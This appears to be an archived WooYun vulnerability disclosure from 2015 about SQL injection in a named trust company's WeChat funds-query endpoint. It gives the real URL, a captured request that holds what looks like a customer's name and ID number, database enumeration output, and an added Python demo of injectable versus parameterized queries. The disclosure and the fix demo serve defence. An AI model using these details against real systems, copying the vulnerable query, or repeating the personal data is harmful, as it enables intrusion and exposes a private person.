WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
2015-10-08: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2015-11-22: The vendor has actively ignored the vulnerability; details are now disclosed to the public.
爱建信托
On the WeChat side: follow the 爱建信托 official account, tap 到账查询 (funds-arrival query), log in, and capture the traffic to obtain a POST request:
http://vip1.gaotime.com/info-weixinAdmin/accountQueryInfo.do (POST)wxid=82976&custumerName=%E7%8E%8B%E5%B8%85&custumerId=110000197605260652
The wxid parameter is vulnerable to SQL injection.
25 databases are exposed:
[*] APEX_030200
[*] APPQOSSYS
[*] CENTER_ADMIN
[*] CENTER_CNLIST
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] JRGAZX
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TZZH
[*] VIP_SYSTEM
[*] WEIXIN
[*] WMSYS
[*] XDB
[*] XHJHK
Looking at CENTER_ADMIN alone, the tables involved hold millions to tens of millions of rows:
Database: CENTER_ADMIN
+--------------------------------+----------+
| Table                          | Entries  |
+--------------------------------+----------+
| INX_COMPONENTWEIGHT            | 30772918 |
| MED_MACROVALUE                 | 13988552 |
| BND_VALUATION                  | 9668978  |
| RPT_PERFORMANCEFORECAST        | 7966170  |
| HK_DAILYQUOTE                  | 5702596  |
| STK_DAILYQUOTEINDEX            | 5064569  |
| RPT_EARNINGFORESTAT            | 4738807  |
| RPT_COMPOSITERATING            | 4217399  |
| INX_DAILYQUOTE                 | 3921276  |
| MGN_DEPOSIT                    | 2981177  |
| STK_DAILYQUOTEFA               | 2918731  |
| STK_DAILYQUOTEFA_NEW           | 2758985  |
| BND_DAILYQUOTE                 | 2687556  |
| FND_NETASSETVAL                | 2655189  |
| FND_NAVINDEX                   | 2653553  |
| RPT_EARNINGFORECAST            | 1909577  |
| IND_VALUE_COMPOSITE            | 1898469  |
| INX_DAILYQUOTEINDEX            | 1816670  |
| FND_MANAGERSECYIELD            | 1769921  |
| AFT_MMZB                       | 1677754  |
| STK_THREEMARKETQUOTEDETAIL     | 1593919  |
| COM_SHAREHOLDER                | 1579059  |
| FUT_CFDAILYQUOTE               | 1550740  |
| MED_INDEXCATALOG               | 1543069  |
| FND_SECUPORTFOLIO              | 1535534  |
| COM_EQUITYCHANGENAS            | 1516609  |
| BND_CONVERSIONRATE             | 1486816  |
| STK_MONEYFLOWDAILY             | 1371650  |
| CAM_NETASSETVAL                | 1105708  |
| CAM_NAVINDEX                   | 1072657  |
+--------------------------------+----------+
There are many more databases; they are not listed one by one. The vendor should check for itself.
Filter the input.
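To make the suggested fix concrete, here is an added example (not code from the report or from the vendor) that contrasts the string-built lookup the report implies with a validated, parameterized version. The table name, columns, sample rows and the in-memory sqlite3 database are all constructed stand-ins; the real backend behind accountQueryInfo.do is Oracle.

```python
import re
import sqlite3

# wxid in the captured request is a plain integer, so the allowlist is numeric only.
_WXID_RE = re.compile(r"[0-9]{1,12}")


def demo_db():
    """Constructed in-memory stand-in for the account-query table (no real data)."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE weixin_account (wxid INTEGER, custumer_name TEXT, custumer_id TEXT)"
    )
    db.executemany(
        "INSERT INTO weixin_account VALUES (?, ?, ?)",
        [(82976, "user-a", "ID-A"), (82977, "user-b", "ID-B"), (82978, "user-c", "ID-C")],
    )
    return db


def query_vulnerable(db, wxid):
    """The pattern the report implies: wxid is concatenated straight into the SQL text,
    so quotes and boolean logic inside the parameter become part of the query."""
    sql = "SELECT custumer_name FROM weixin_account WHERE wxid = '" + wxid + "'"
    return [row[0] for row in db.execute(sql)]


def is_valid_wxid(wxid):
    """Input filter: accept only a short, purely numeric identifier."""
    return _WXID_RE.fullmatch(wxid) is not None


def query_fixed(db, wxid):
    """Hardened lookup: reject anything non-numeric, then bind the value as data
    rather than splicing it into the statement."""
    if not is_valid_wxid(wxid):
        raise ValueError("wxid must be a numeric id")
    sql = "SELECT custumer_name FROM weixin_account WHERE wxid = ?"
    return [row[0] for row in db.execute(sql, (int(wxid),))]
```

Either control alone (the allowlist or the bound parameter) stops the tautology from widening the query; using both also gives a clean rejection to log and alert on.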
Could not reach the vendor, or the vendor actively refused the report.